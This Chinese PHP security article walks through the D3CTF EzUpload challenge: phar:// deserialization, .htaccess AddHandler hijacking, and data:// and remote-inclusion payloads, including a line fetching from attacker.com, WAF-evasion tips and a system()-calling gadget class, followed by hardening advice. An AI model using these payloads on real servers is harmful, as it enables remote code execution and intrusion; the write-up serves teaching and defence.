PHP安全实战：利用phar://协议和.htaccess绕过实现文件上传漏洞的几种高级玩法-深圳市維司達科技有限公司

PHP安全实战：深入剖析phar协议与.htaccess的高级攻击手法

1. 从CTF到实战：理解PHP协议处理机制的潜在风险

在2019年D3CTF的EzUpload赛题中，一道看似简单的文件上传漏洞背后，隐藏着PHP协议处理机制的深层安全问题。这道题目不仅考察了基础的phar反序列化利用，更巧妙地结合了.htaccess文件解析规则篡改，为安全研究者提供了一个绝佳的学习案例。

PHP的协议封装器（Wrapper）设计初衷是为了简化不同数据源的访问方式，但过度灵活的特性往往成为攻击者的跳板。以phar://为例，它不仅能读取压缩包文件，还会自动解析其中嵌入的序列化元数据——这个特性在EzUpload中被用来触发反序列化漏洞。

典型攻击链条的构成要素：

可控的文件上传点（允许上传.phar或可被解析为phar的文件）
存在可被利用的魔术方法（如__destruct、__wakeup）
服务器配置允许phar协议或相关协议（如data://）的访问

// 典型的phar文件生成代码示例 $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->setMetadata($maliciousObject); // 注入恶意对象 $phar->addFromString('test.txt', 'payload'); $phar->stopBuffering();

2. phar协议的高级利用技巧

2.1 绕过文件类型限制

在实际渗透测试中，直接上传.phar文件往往会被拦截。EzUpload展示了三种经典绕过方式：

文件头伪装：在phar的stub部分添加GIF89a等图像文件头
扩展名混淆：利用服务器配置缺陷，上传.phar.jpg等双重扩展名文件
内容编码转换：通过gzip压缩改变文件特征（注意zip压缩可能破坏phar结构）

提示：现代WAF通常会检测phar文件的特征签名，添加垃圾数据或使用非常规压缩参数可以增加绕过概率

2.2 元数据注入的艺术

phar的setMetadata方法可以存储任意序列化对象，这为攻击者提供了极大的操作空间：

class Exploit { public $command = 'id'; function __destruct() { system($this->command); } } $phar->setMetadata(new Exploit());

关键技巧：

优先选择存在魔术方法的类进行利用
注意PHP版本差异对序列化格式的影响
在受限环境下，可利用phar://的目录穿越特性（如phar:///path/to/file.phar/../）

3. .htaccess的攻防两面性

3.1 解析规则劫持技术

EzUpload中利用.htaccess实现的关键突破：

AddHandler php7-script .txt

这条规则使得所有.txt文件都会被当作PHP脚本解析，结合phar协议的特性，攻击者可以：

上传伪装成图片的phar文件（如exploit.jpg）
通过.htaccess强制将.txt作为PHP解析
使用phar://访问时，其中的test.txt会被当作PHP执行

防御视角的检查清单：

禁用上传目录的.htaccess覆盖权限
对AddHandler指令进行严格过滤
对上传目录设置php_flag engine off

3.2 多协议组合攻击

EzUpload展示了data://与phar://的完美配合：

协议类型	利用场景	典型payload
data://	直接写入.htaccess内容	`url=data:text/plain,AddHandler php7-script .txt`
phar://	触发反序列化	`url=phar://upload/exploit.jpg`
http://	远程文件包含	`url=http://attacker.com/exploit.phar`

4. 从CTF到真实世界的防御策略

4.1 安全配置强化

php.ini关键参数：

; 禁用危险协议 allow_url_fopen = Off allow_url_include = Off disable_functions = phar_open,phar_file ; 限制phar功能 phar.readonly = On

4.2 防御性编程实践

文件上传处理：
- 使用finfo检测真实文件类型
- 重命名上传文件为随机哈希值
- 存储上传文件在不可访问的目录
反序列化防护：
- 避免直接反序列化用户输入
- 使用json_decode替代unserialize
- 实现__wakeup和__destruct的安全检查

// 安全的文件上传处理示例 $finfo = new finfo(FILEINFO_MIME_TYPE); if (!in_array($finfo->file($_FILES['file']['tmp_name']), ['image/jpeg'])) { throw new Exception('Invalid file type'); } $newName = bin2hex(random_bytes(16)) . '.dat'; move_uploaded_file($_FILES['file']['tmp_name'], '/secure/path/' . $newName);

4.3 监控与应急响应

建立针对协议滥用的检测规则：

监控包含phar://、data://等特殊协议的请求
记录异常的.htaccess文件修改行为
对上传目录进行实时文件完整性检查

在真实渗透测试中，这类漏洞往往出现在：

老旧CMS系统的上传组件
自定义开发的文件管理功能
配置不当的云存储接口

5. 拓展思考：协议安全的深度防御

现代PHP应用应该采用分层防御策略：

网络层：
- 使用WAF拦截可疑协议请求
- 限制出站连接防止数据外泄
系统层：
- 配置open_basedir限制目录访问
- 使用Docker等容器技术隔离环境
代码层：
- 实现白名单协议控制
- 对动态包含路径进行严格校验

// 安全的文件包含实现 $allowedProtocols = ['file']; $path = parse_url($inputPath, PHP_URL_SCHEME); if (!in_array($path, $allowedProtocols)) { die('Protocol not allowed'); }

在最近参与的某次企业安全评估中，我们发现一个看似无害的文件预览功能，由于未过滤phar协议，配合服务器上的临时文件清理缺陷，最终实现了远程代码执行。这再次证明，协议安全问题往往存在于最意想不到的地方。